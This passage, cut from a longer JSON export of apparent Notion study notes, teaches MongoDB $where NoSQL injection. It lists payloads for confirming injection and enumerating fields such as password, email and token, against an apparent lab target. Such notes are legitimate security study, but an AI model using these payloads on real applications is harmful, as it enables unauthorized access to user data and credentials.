(foo):","href":null}],"color":"default","list_start_index":3},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80ae-a0f1-d95a243e4450","parent":{"type":"block_id","block_id":"251dc9c5-3059-801c-9b90-f49765e711ed"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.foo!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.foo!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-8071-b8ed-f92cbeef86b6","parent":{"type":"block_id","block_id":"251dc9c5-3059-801c-9b90-f49765e711ed"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8059-b247-c42d048bb477","parent":{"type":"block_id","block_id":"251dc9c5-3059-801c-9b90-f49765e711ed"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.foo!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.foo!=''\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8016-b4f3-f221970cede8","parent":{"type":"block_id","block_id":"251dc9c5-3059-801c-9b90-f49765e711ed"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the ","href":null},{"type":"text","text":{"content":"password field behaves like username","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"password field behaves like username","href":null},{"type":"text","text":{"content":", it exists.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", it exists.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ee-a7c5-e7a178557a0b","parent":{"type":"block_id","block_id":"251dc9c5-3059-801c-9b90-f49765e711ed"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If it behaves like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If it behaves like ","href":null},{"type":"text","text":{"content":"foo","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"foo","href":null},{"type":"text","text":{"content":", it doesn’t exist.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", it doesn’t exist.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-80be-bf23-e1fe3ffe70a9","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-8018-8e73-e05ee69b5667","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"heading_3","heading_3":{"rich_text":[{"type":"text","text":{"content":"Automating with a dictionary attack","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Automating with a dictionary attack","href":null}],"is_toggleable":false,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f8-ade7-f6f02cbe8f22","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Use a list of common field names (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Use a list of common field names (","href":null},{"type":"text","text":{"content":"password","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"password","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"email","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"email","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"token","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"token","href":null},{"type":"text","text":{"content":", etc.).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc.).","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8019-b844-cfb3471a6eec","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Cycle through them in the payloads to see which ones behave like real fields.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Cycle through them in the payloads to see which ones behave like real fields.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8024-ae3a-dbb3260d4737","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-8065-8e0c-cce9dc979a5d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Key takeaway:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Key takeaway:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8000-97bc-dcd95baebc60","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You’re checking field existence by injecting conditions into ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You’re checking field existence by injecting conditions into ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-809a-b9e3-e8cb4a9e555d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The database response pattern reveals which fields are valid.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The database response pattern reveals which fields are valid.","href":null}],"icon":null,"color":"default"},"archived":false}]}]},{"object":"block","id":"251dc9c5-3059-8063-882c-d983598d284d","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-16T11:27:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL Injection (MongoDB $where) – Data Extraction Methodology","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"blue"},"plain_text":"NoSQL Injection (MongoDB $where) – Data Extraction Methodology","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8043-86ef-f5c7349f7340","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T11:29:00.000Z","last_edited_time":"2025-08-16T11:30:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Attack Flow","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Attack Flow","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-808f-b205-d2f50941d78e","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 1 — Confirm injection point","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 1 — Confirm injection point","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80cb-bfde-d8f27fb4262e","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Trigger the basic ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Trigger the basic ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" query to verify that JavaScript injection works.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" query to verify that JavaScript injection works.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80f3-bd75-eac52d9d944c","parent":{"type":"block_id","block_id":"251dc9c5-3059-80cb-bfde-d8f27fb4262e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:28:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Example request:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example request:","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-80db-818c-ed8847027d3f","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/user/lookup?username=admin","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/user/lookup?username=admin","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ca-80f5-f63b17b3c255","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Underlying query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Underlying query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-805b-9ea8-e23edaae9ebe","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-807e-a860-dad76e3d131a","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the app responds normally, it’s using ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the app responds normally, it’s using ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c5-9b5a-fcfacb039cc8","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If you inject something simple like:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you inject something simple like:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8072-be63-d5d35ab66806","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && 'a'=='a\nor\nadmin' || 'a'=='a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && 'a'=='a\nor\nadmin' || 'a'=='a","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-8007-af83-f6899c5076f7","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query becomes:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query becomes:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8005-b97b-d364606f9002","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && 'a'=='a'\"}\nor\n{\"$where\": \"this.username == 'admin' || 'a'=='a'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && 'a'=='a'\"}\nor\n{\"$where\": \"this.username == 'admin' || 'a'=='a'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8065-b853-d0057682d81a","parent":{"type":"block_id","block_id":"251dc9c5-3059-808f-b205-d2f50941d78e"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If this returns data, the input is injectable.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If this returns data, the input is injectable.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8081-9a30-e511c5f4067c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 2 — Identify valid field names","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 2 — Identify valid field names","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-804c-9375-d37bc168e35d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Before extracting data, you must confirm which fields exist.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Before extracting data, you must confirm which fields exist.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ac-b887-c7bdd2ca245c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Baseline test with a known field","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Baseline test with a known field","href":null},{"type":"text","text":{"content":" (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (","href":null},{"type":"text","text":{"content":"username","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"username","href":null},{"type":"text","text":{"content":"):","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"):","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-803c-b469-fcd690457481","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.username!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.username!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-808e-a72d-f6bd8edfa66b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8001-baf4-f0fca875467b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.username!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.username!=''\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-80bc-943e-d5c9f5394cf5","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Test suspected field","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Test suspected field","href":null},{"type":"text","text":{"content":" (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (","href":null},{"type":"text","text":{"content":"password","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"password","href":null},{"type":"text","text":{"content":"):","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"):","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-803e-85ed-ee2e82140437","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password!='","href":null}],"language":"plain 